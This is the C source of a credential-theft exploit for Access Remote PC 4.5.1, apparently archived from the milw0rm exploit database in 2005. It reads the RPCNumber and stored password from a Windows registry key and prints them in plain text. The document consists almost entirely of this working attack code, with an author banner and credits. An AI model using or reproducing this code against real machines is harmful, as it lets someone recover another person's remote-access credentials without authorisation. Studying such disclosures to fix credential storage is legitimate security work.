/*****************************************************************

Access Remote PC 4.5.1 Local Password Disclosure Exploit by Kozan

Application: Access Remote PC 4.5.1 (and probably prior versions)
Vendor: www.access-remote-pc.com

Vulnerable Description: Access Remote PC 4.5.1 discloses passwords
to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan@netmagister.com

*****************************************************************/

#include <windows.h>
#include <stdio.h>

#define BUF 100

int main()
{
       HKEY hKey;
       char RPCNumber[BUF], Password[BUF];
       DWORD dwBuf = BUF;

       if( RegOpenKeyEx( HKEY_CURRENT_USER,
                         "Software\\Access Remote PC\\Client\\Options\\Proxy",
                         0,
                         KEY_QUERY_VALUE,
                         &hKey
                         ) !=ERROR_SUCCESS )
       {
               fprintf( stdout, "Access Remote PC is not installed on you PC!\n" );
               return -1;
       }

       if( RegQueryValueEx( hKey,
                            "RPCNumber",
                            NULL,
                            NULL,
                            (BYTE *)&RPCNumber,
                            &dwBuf
                            ) != ERROR_SUCCESS )
       lstrcpy( RPCNumber,"Not Found!\n" );

       if( RegQueryValueEx( hKey,
                            "Password",
                            NULL,
                            NULL,
                            (BYTE *)&Password,
                            &dwBuf
                            ) != ERROR_SUCCESS )
       lstrcpy( Password,"Not Found!\n" );

       fprintf( stdout, "Access Remote PC 4.5.1 Local Exploit by Kozan\n" );
       fprintf( stdout, "Credits to AtmaCA\n" );
       fprintf( stdout, "www.netmagister.com - www.spyinstructors.com \n" );
       fprintf( stdout, "kozan@netmagister.com\n\n" );
       fprintf( stdout, "RPCNumber\t: %s\n", RPCNumber );
       fprintf( stdout, "Password\t: %s\n", Password );

       return 0;
}

// milw0rm.com [2005-07-04]
